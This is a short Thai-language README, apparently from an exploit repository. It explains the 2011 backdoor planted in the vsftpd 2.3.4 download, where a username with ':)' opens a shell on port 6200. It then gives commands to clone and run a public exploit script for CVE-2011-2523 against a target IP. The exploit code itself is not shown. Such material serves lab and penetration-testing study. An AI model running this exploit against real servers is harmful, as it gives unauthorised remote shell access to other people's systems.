Very Secure FTP Daemon (vsftpd) เป็นเซิร์ฟเวอร์ FTP สำหรับแพลตฟอร์มที่มีลักษณะคล้าย Unix รวมถึง Linux เผยแพร่ภายใต้เงื่อนไขของ GNU General Public Licence รองรับ IPv6 เช่นเดียวกับ SSL
มีการเปิดเผยในเดือนกรกฎาคม พ.ศ. 2554 ว่า vsftpd เวอร์ชัน 2.3.4 ซึ่งสามารถดาวน์โหลดได้จากไซต์หลักนั้นถูกโจมตี ผู้ใช้เข้าสู่ระบบเซิร์ฟเวอร์ vsftpd-2.3.4 ที่ถูกแฮ็กสามารถรับเชลล์คำสั่งบนพอร์ต 6200 ได้โดยป้อน :) หน้ายิ้มเป็นชื่อผู้ใช้ นี่ไม่ใช่ข้อบกพร่องด้านความปลอดภัยใน vsftpd; แต่กลับมีคนอัปโหลด vsftpd เวอร์ชันแยกต่างหากที่มี backdoor ไซต์ดังกล่าวได้ถูกย้ายไปยัง Google App Engine แล้ว
sudo apt update
sudo apt install python3
sudo apt install python3-pip
pip install argparse
git clone https://github.com/Lynk4/CVE-2011-2523.git
cd ./CVE-2011-2523
chmod +x exploit.py
python3 exploit.py -host Target_IP
